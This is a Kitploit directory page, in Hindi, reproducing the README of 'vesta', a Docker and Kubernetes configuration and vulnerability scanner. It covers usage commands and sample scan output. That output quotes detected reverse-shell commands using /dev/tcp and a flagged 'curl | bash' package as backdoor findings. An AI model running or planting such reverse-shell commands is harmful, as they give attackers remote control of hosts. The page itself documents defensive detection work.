Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
vesta — क्लाउड कंप्यूटिंग के वास्तविक प्रवेश पर आधारित भेद्यताओं, डॉकर और कुबेरनेट्स क्लस्टर कॉन्फ़िगरेशन का स्थैतिक विश्लेषण और पहचान उपकरण। | Kitploit
उपकरण/GitHubGitHub/kvesta/vesta
स्थैतिक विश्लेषणभेद्यता स्कैनरकंटेनर सुरक्षाकॉन्फ़िगरेशन ऑडिटिंगक्लाउड सुरक्षाDevSecOps
GitHubkvesta/vesta

vesta

क्लाउड कंप्यूटिंग के वास्तविक प्रवेश पर आधारित भेद्यताओं, डॉकर और कुबेरनेट्स क्लस्टर कॉन्फ़िगरेशन का स्थैतिक विश्लेषण और पहचान उपकरण।

रिपॉजिटरी देखें
205311 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें


एक स्थैतिक विश्लेषण उपकरण जो क्लाउड कंप्यूटिंग की वास्तविक पैठ पर आधारित कमजोरियों, डॉकर और कुबरनेटिस क्लस्टर कॉन्फ़िगरेशन का पता लगाता है।

अंग्रेज़ी · 简体中文

अवलोकन

Vesta एक स्थैतिक विश्लेषण उपकरण है जो कमजोरियों, डॉकर और कुबरनेटिस क्लस्टर कॉन्फ़िगरेशन का पता लगाता है। यह कुबरनेटिस और डॉकर कॉन्फ़िगरेशन, क्लस्टर पॉड्स और कंटेनरों की सुरक्षित प्रथाओं के साथ जाँच करता है।

Vesta एक लचीला उपकरण है जो विभिन्न प्रकार के सिस्टम (विंडोज, लिनक्स, मैकओएस) में भौतिक मशीनों पर चल सकता है।

Vesta क्या जाँच सकता है

स्कैन

  • समर्थित स्कैन इनपुट
    • इमेज
    • कंटेनर
    • फ़ाइलसिस्टम
    • वीएम (TODO)
  • प्रमुख पैकेज प्रबंधनों की कमजोरियों को स्कैन करें
    • apt/apt-get
    • rpm
    • yum
    • dpkg
  • भाषा-विशिष्ट पैकेजों में दुर्भावनापूर्ण पैकेज और कमजोरियों को स्कैन करें
    • Java(Jar, War. प्रमुख लाइब्रेरी: log4j)
    • NodeJs(NPM, YARN)
    • Python(Wheel, Poetry)
    • Golang(Go बाइनरी)
    • PHP(Composer, प्रमुख फ्रेमवर्क: laravel, thinkphp, wordpress, wordpress प्लगइन्स आदि)
    • Rust(Rust बाइनरी)
    • अन्य(अन्य कमजोरियाँ जो संभावित कंटेनर एस्केप का कारण बन सकती हैं और संदिग्ध ज़हर इमेज की जाँच करें)

डॉकर


कुबरनेटिस

बिल्ड

Vesta Go 1.18 के साथ बनाया गया है।```bash make build

root@kitploit:~
## त्वरित प्रारंभ

इमेज या कंटेनर स्कैन का उदाहरण, एक tar फ़ाइल द्वारा इनपुट करने के लिए `-f` का उपयोग करें, start vesta:```bash
# Container
vesta scan image cve-2019-14234_web:latest
vesta scan image -f example.tar

# Image
vesta scan container <CONTAINER ID>
vesta scan container -f example.tar

# Filesystem
vesta scan fs <path_of_filesystem>

आउटपुट:```bash 2022/11/29 22:50:00 Searching for image 2022/11/29 22:50:19 Begin upgrading vulnerability database 2022/11/29 22:50:19 Vulnerability Database is already initialized 2022/11/29 22:50:19 Begin to analyze the layer 2022/11/29 22:50:35 Begin to scan the layer

Detected 216 vulnerabilities

+-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 208 | python3.6 - Django | 2.2.3 | CVE-2019-14232 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. If | | | | | | | | django.utils.text.Truncator's | | | | | | | | chars() and words() methods | | | | | | | | were passed the html=True | | | | | | | | argument, t ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 209 | | 2.2.3 | CVE-2019-14233 | 7.5 | high | An issue was discovered | | | | | | | | in Django 1.11.x before | | | | | | | | 1.11.23, 2.1.x before 2.1.11, | | | | | | | | and 2.2.x before 2.2.4. | | | | | | | | Due to the behaviour of | | | | | | | | the underlying HTMLParser, | | | | | | | | django.utils.html.strip_tags | | | | | | | | would be extremely ... | +-----+ +-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 210 | | 2.2.3 | CVE-2019-14234 | 9.8 | critical | An issue was discovered in | | | | | | | | Django 1.11.x before 1.11.23, | | | | | | | | 2.1.x before 2.1.11, and 2.2.x | | | | | | | | before 2.2.4. Due to an error | | | | | | | | in shallow key transformation, | | | | | | | | key and index lookups for | | | | | | | | django.contrib.postgres.f ... | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+ | 211 | python3.6 - numpy | 1.24.2 | | 8.5 | high | Malicious package is detected in | | | | | | | | '/usr/local/lib/python3.6/site-packages/numpy/setup.py', | | | | | | | | malicious command "curl | bash" are | | | | | | | | detected. | +-----+--------------------+-----------------+------------------+-------+----------+------------------------------------------------------------------+

Docker Histories: +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | ID | NAME | CURRENT/VULNERABLE VERSION | CVEID | SCORE | LEVEL | DESCRIPTION | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 1 | Image History | - / - | - | 0.0 | high | Confusion value found | | | | | | | | in ENV: 'command' with | | | | | | | | the plain text 'bash -i | | | | | | | | >&/dev/tcp/127.0.0.1/9999 0>&1 | | | | | | | | '. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+ | 2 | | - / - | - | 0.0 | medium | Docker history has found the | | | | | | | | senstive environment with | | | | | | | | key 'SECRET_KEY' and value: | | | | | | | | 123456. | +----+---------------+----------------------------+-------+-------+--------+--------------------------------+

root@kitploit:~
<details>
<summary>परिणाम</summary>

![](https://assets.kitploit.com/production/public/readmes/5859/9812488f35975e6dfeb2fb38e3498564a2fd1c8d699ccbff2f409390dcc39afd.gif)

</details>

डॉकर कॉन्फ़िग स्कैन का उदाहरण, वेस्टा प्रारंभ करें:```bash
vesta analyze docker

या dokcer के साथ चलाएं```bash make run.docker

root@kitploit:~
आउटपुट:```bash
2022/11/29 23:06:32 Start analysing
2022/11/29 23:06:32 Getting engine version
2022/11/29 23:06:32 Getting docker server version
2022/11/29 23:06:32 Getting kernel version

Detected 3 vulnerabilities

+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
| ID |      CONTAINER DETAIL      |     PARAM      |             VALUE              | SEVERITY |          DESCRIPTION           |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  1 | Name: Kernel               | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: None                   |                |                                |          | the CVE-2022-0492 with         |
|    |                            |                |                                |          | CAP_SYS_ADMIN and v1           |
|    |                            |                |                                |          | architecture of cgroups        |
|    |                            |                |                                |          | vulnerablility, has a          |
|    |                            |                |                                |          | potential container escape.    |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  2 | Name: vesta_vuln_test      | kernel version | 5.10.104-linuxkit              | critical | Kernel version is suffering    |
|    | ID: 207cf8842b15           |                |                                |          | the Dirty Pipe vulnerablility, |
|    |                            |                |                                |          | has a potential container      |
|    |                            |                |                                |          | escape.                        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  3 | Name: Image Tag            | Privileged     | true                           | critical | There has a potential container|
|    | ID: None                   |                |                                |          | escape in privileged  module.  |
|    |                            |                |                                |          |                                |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+
|  4 | Name: Image Configuration  | Image History  | Image name:                    | high     | Weak password found            |
|    | ID: None                   |                | vesta_history_test:latest |    |          | in command: ' echo             |
|    |                            |                | Image ID: 4bc05e1e3881         |          | 'password=test123456' >        |
|    |                            |                |                                |          | config.ini # buildkit'.        |
+----+----------------------------+----------------+--------------------------------+----------+--------------------------------+

Kubernetes कॉन्फ़िग स्कैन का उदाहरण, vesta प्रारंभ करें:```bash vesta analyze k8s

root@kitploit:~
आउटपुट:```bash
2022/11/29 23:15:59 Start analysing
2022/11/29 23:15:59 Getting docker server version
2022/11/29 23:15:59 Getting kernel version

Detected 4 vulnerabilities

Pods:
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
| ID |           POD DETAIL           |             PARAM              |             VALUE              |         TYPE          | SEVERITY |          DESCRIPTION           |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  1 | Name: vulntest | Namespace:    | sidecar name: vulntest |       | true                           | Pod                   | critical | There has a potential          |
|    | default | Status: Running |    | Privileged                     |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest |       | Token:Password123456           | Sidecar EnvFrom       | high     | Sidecar envFrom ConfigMap has  |
|    |                                | env                            |                                |                       |          | found weak password:           |
|    |                                |                                |                                |                       |          | 'Password123456'.              |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: sidecartest |    | MALWARE: bash -i >&            | Sidecar Env           | high     | Container 'sidecartest' finds  |
|    |                                | env                            | /dev/tcp/10.0.0.1/8080 0>&1    |                       |          | high risk content(score:       |
|    |                                |                                |                                |                       |          | 0.91 out of 1.0), which is a   |
|    |                                |                                |                                |                       |          | suspect command backdoor.      |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|  2 | Name: vulntest2 | Namespace:   | sidecar name: vulntest2 |      | CAP_SYS_ADMIN                  | capabilities.add      | critical | There has a potential          |
|    | default | Status: Running |    | capabilities                   |                                |                       |          | container escape in privileged |
|    | Node Name: docker-desktop      |                                |                                |                       |          | module.                        |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | true                           | kube-api-access-lcvh8 | critical | Mount service account          |
|    |                                | automountServiceAccountToken   |                                |                       |          | and key permission are         |
|    |                                |                                |                                |                       |          | given, which will cause a      |
|    |                                |                                |                                |                       |          | potential container escape.    |
|    |                                |                                |                                |                       |          | Reference clsuterRolebind:     |
|    |                                |                                |                                |                       |          | vuln-clusterrolebinding |      |
|    |                                |                                |                                |                       |          | roleBinding: vuln-rolebinding  |
+    +                                +--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+
|    |                                | sidecar name: vulntest2 |      | cpu                            | Pod                   | low      | CPU usage is not limited.      |
|    |                                | Resource                       |                                |                       |          |                                |
|    |                                |                                |                                |                       |          |                                |
+----+--------------------------------+--------------------------------+--------------------------------+-----------------------+----------+--------------------------------+

Configures:
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
| ID |            TYPEL            |             PARAM              |                         VALUE                          | SEVERITY |          DESCRIPTION           |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  1 | K8s version less than v1.24 | kernel version                 | 5.10.104-linuxkit                                      | critical | Kernel version is suffering    |
|    |                             |                                |                                                        |          | the CVE-2022-0185 with         |
|    |                             |                                |                                                        |          | CAP_SYS_ADMIN vulnerablility,  |
|    |                             |                                |                                                        |          | has a potential container      |
|    |                             |                                |                                                        |          | escape.                        |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  2 | ConfigMap                   | ConfigMap Name: vulnconfig     | db.string:mysql+pymysql://dbapp:Password123@db:3306/db | high     | ConfigMap has found weak       |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  3 | Secret                      | Secret Name: vulnsecret-auth   | password:Password123                                   | high     | Secret has found weak          |
|    |                             | Namespace: default             |                                                        |          | password: 'Password123'.       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  4 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | vuln-clusterrolebinding |      | create, update | resources:                            |          | resources given to the         |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | default service account, which |
|    |                             | kind: ClusterRole | subject    |                                                        |          | will cause a potential data    |
|    |                             | kind: Group | subject name:    |                                                        |          | leakage.                       |
|    |                             | system:serviceaccounts:vuln |  |                                                        |          |                                |
|    |                             | namespace: vuln                |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  5 | RoleBinding                 | binding name: vuln-rolebinding | verbs: get, watch, list,                               | high     | Key permissions with key       |
|    |                             | | rolename: vuln-role | role   | create, update | resources:                            |          | resources given to the         |
|    |                             | kind: Role | subject kind:     | pods, services                                         |          | default service account, which |
|    |                             | ServiceAccount | subject name: |                                                        |          | will cause a potential data    |
|    |                             | default | namespace: default   |                                                        |          | leakage.                       |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
|  6 | ClusterRoleBinding          | binding name:                  | verbs: get, watch, list,                               | warning  | Key permission are given       |
|    |                             | vuln-clusterrolebinding2 |     | create, update | resources:                            |          | to unknown user 'testUser',    |
|    |                             | rolename: vuln-clusterrole |   | pods, services                                         |          | printing it for checking.      |
|    |                             | subject kind: User | subject   |                                                        |          |                                |
|    |                             | name: testUser | namespace:    |                                                        |          |                                |
|    |                             | all                            |                                                        |          |                                |
+----+-----------------------------+--------------------------------+--------------------------------------------------------+----------+--------------------------------+
परिणाम

सहायता जानकारी```bash

$./vesta -h Vesta is a static analysis of vulnerabilities, Docker and Kubernetes configuration detect toolkit Tutorial is available at https://github.com/kvesta/vesta

Usage: vesta [command]

Available Commands: analyze Kubernetes analyze completion Generate the autocompletion script for the specified shell help Help about any command scan Container scan update Update vulnerability database version Print version information and quit

Flags: -h, --help help for vesta

root@kitploit:~
## कार्यक्रम

### KCon 2023 हथियार सूची
- [https://kcon.knownsec.com/index.php?s=bqp&c=category&id=2](https://kcon.knownsec.com/index.php?s=bqp&c=category&id=2)
टूल डाउनलोड करें
समर्थितजांच आइटमविवरणगंभीरतासंदर्भ
✔PrivilegeAllowedविशेषाधिकार मॉड्यूल की अनुमति है।गंभीरसंदर्भ
✔Capabilitiesखतरनाक क्षमताएँ खुली हैं।गंभीरसंदर्भ
✔Volume Mountखतरनाक स्थान माउंट करना।गंभीरसंदर्भ
✔Docker Unauthorized2375 पोर्ट खुला है और अनधिकृत है।गंभीरसंदर्भ
✔Kernel versionकर्नेल संस्करण एस्केप संस्करण से कम है।गंभीरसंदर्भ
✔Network Moduleनेट मॉड्यूल host है और containerd संस्करण 1.41 से कम है।गंभीर/मध्यम
✔Pid Moduleपीआईडी मॉड्यूल host है।उच्च
✔Docker Server versionसर्वर संस्करण में कमजोर संस्करण शामिल है।गंभीर/उच्च/ मध्यम/निम्न
✔Docker env password checkडेटाबेस में कमजोर पासवर्ड की जाँच करें।उच्च/मध्यम
✔Docker Historyडॉकर लेयर्स और पर्यावरण में कुछ खतरनाक कमांड हैं।उच्च/मध्यम
✔Docker Backdoorडॉकर एनवी कमांड में दुर्भावनापूर्ण कमांड हैं।गंभीर/उच्च
✔Docker Swarmडॉकर स्वार्म में खतरनाक कॉन्फ़िग या रहस्य हैं या कंटेनर असुरक्षित हैं।मध्यम/निम्न
✔Docker supply chainडॉकर आपूर्ति श्रृंखला में कमजोर कॉन्फ़िगरेशन हैंगंभीर/उच्च/ मध्यमसंदर्भ
समर्थितजांच आइटमविवरणगंभीरतासंदर्भ
✔PrivilegeAllowedविशेषाधिकार मॉड्यूल की अनुमति है।गंभीरसंदर्भ
✔Capabilitiesखतरनाक क्षमताएँ खुली हैं।गंभीरसंदर्भ
✔PV and PVCपीवी खतरनाक स्थान पर माउंट किया गया है और सक्रिय है।गंभीर/मध्यमसंदर्भ
✔RBACआरबीएसी में clusterrolebinding या rolebinding में कुछ असुरक्षित कॉन्फ़िगरेशन हैं।उच्च/मध्यम/ निम्न/चेतावनी
✔Kubernetes-dashborad-enable-skip-login और खाता अनुमति की जाँच करना।गंभीर/उच्च/निम्नसंदर्भ
✔Kernel versionकर्नेल संस्करण एस्केप संस्करण से कम है।गंभीरसंदर्भ
✔Docker Server version (k8s versions is less than v1.24)सर्वर संस्करण में कमजोर संस्करण शामिल है।गंभीर/उच्च/ मध्यम/निम्न
✔Kubernetes certification expirationप्रमाणपत्र 30 दिनों के बाद समाप्त हो जाता है।मध्यम
✔ConfigMap and Secret checkConfigMap या Secret में कमजोर पासवर्ड की जाँच करें।उच्च/मध्यम/निम्नसंदर्भ
✔PodSecurityPolicy check (k8s version under the v1.25)PodSecurityPolicy खतरनाक पॉड कॉन्फ़िगरेशन को सहन करता है।उच्च/मध्यम/निम्नसंदर्भ
✔Auto Mount ServiceAccount Tokenडिफ़ॉल्ट सेवा टोकन माउंट हो रहा है।गंभीर/उच्च/ मध्यम/निम्नसंदर्भ
✔NoResourceLimitsकोई संसाधन सीमा निर्धारित नहीं है।निम्नसंदर्भ
✔Job and CronjobJob या CronJob में कोई seccomp या seLinux सेट नहीं है।निम्नसंदर्भ
✔Envoy adminEnvoy एडमिन खुला है और 0.0.0.0 पर सुन रहा है।उच्च/मध्यमसंदर्भ
✔Cilium versionCilium का कमजोर संस्करण है।गंभीर/उच्च/ मध्यम/निम्नसंदर्भ
✔Istio configurationsIstio में कमजोर संस्करण और कमजोर कॉन्फ़िगरेशन हैं।गंभीर/उच्च/ मध्यम/निम्नसंदर्भ
✔Kubelet 10250/10255 and Kubectl proxy10255/10250 पोर्ट खुले हैं और अनधिकृत हैं या Kubectl proxy खुला है।उच्च/मध्यम/निम्न
✔Etcd configurationEtcd सुरक्षित कॉन्फ़िगरेशन जाँच।उच्च/मध्यम
✔Sidecar configurationsSidecar में कुछ खतरनाक कॉन्फ़िगरेशन हैं।गंभीर/उच्च/ मध्यम/निम्न
✔Pod annotationपॉड एनोटेशन में कुछ असुरक्षित कॉन्फ़िगरेशन हैं।उच्च/मध्यम/ निम्न/चेतावनीसंदर्भ
✔DaemonSetDaemonSet में असुरक्षित कॉन्फ़िगरेशन हैं।गंभीर/उच्च/ मध्यम/निम्न
✔Backdoorबैकडोर का पता लगाना।गंभीर/उच्चसंदर्भ
✔Lateral admin movementपॉड एक मास्टर नोड निर्दिष्ट करता है।मध्यम/निम्न
https://vuln.com